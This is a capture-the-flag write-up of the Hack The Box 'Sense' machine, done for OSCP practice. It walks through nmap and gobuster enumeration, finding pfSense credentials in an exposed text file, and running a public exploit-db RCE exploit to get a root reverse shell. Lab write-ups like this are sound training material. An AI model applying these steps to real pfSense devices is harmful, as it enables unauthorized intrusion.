Hack The Box — Sense — without Metasploit (TJNull’s list for OSCP)

This is my 8th write-up for Sense, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

1. Enumeration and Scanning (Information Gathering).
2. Initial Foothold.
3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target.

nmap -sC -sV -O -A -T4 -Pn 10.129.75.145

• -sC is used to run default scripts to enumerate the services further.
• -sV is used for Version enumeration of the services
• -O is used to for OS enumeration. (not usually needed if you use -A. But who cares)
• -A is used for aggressive (not usually recommended in a real environment)
• -T4 is used to set the number of parallel threads.
• -Pn is used to force enumerate even if the machine is not responding to icmp (ping) packets.

nmap result

It looks like there are 2 http ports open. By navigating to port 80 we can see that we are still landing on port 443 (https). So we are gonna focus on that.

login for pfsense

I tried doing, SQLi, admin:admin and other usual credentials but nothing worked. I right clicked and viewed the source of the page.

view-source of index.php

From there I got to know that it is a pfsense device.

I searched for exploits on exploit-db, but most RCE exploit required valid credentials, so I couldn’t do anything with them.

From here, I started directory busting.

gobuster dir -u https://10.129.75.145 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -t 200 -k — no-error

gobuster output1

From there I discovered index.html page. I tried going there.

index.html

Here I could see a hyperlink saying “Begin installation” I tried clicking it, but nothing happened. Then I viewed the source code again, to see where it’s leading.

view-source index.html

I found out that it was leading to a cgi script dfuife.cgi . First thing that came to my mind was ‘SHELLSHOCK’. I tried exploiting it in different ways but the script appeared to be not responding.

After a while when I gave up on shellshock, I refered back to my gobuster and found out two interesting txt files

• system-users.txt
• changelogs.txt

By reading system-users.txt I found a support ticket having the credentials.

login credentials

A quick Google search told me that default password for PFSense is pfsense .

I tried logging in, but credentials appeared to be wrong. I made a small alteration and put small ‘r’ in Rohit instead of capital ‘R’. And I was able to login.

Exploitation

From there, I remembered that I saw some exploits on exploit-db that required authentication. So I found the exploit that worked.

https://www.exploit-db.com/exploits/43560

I downloaded and ran that exploit with the arguments that were needed, along with the listener to capture the shell.

exploit

reverse-shell

And I got a root shell :)

EZ!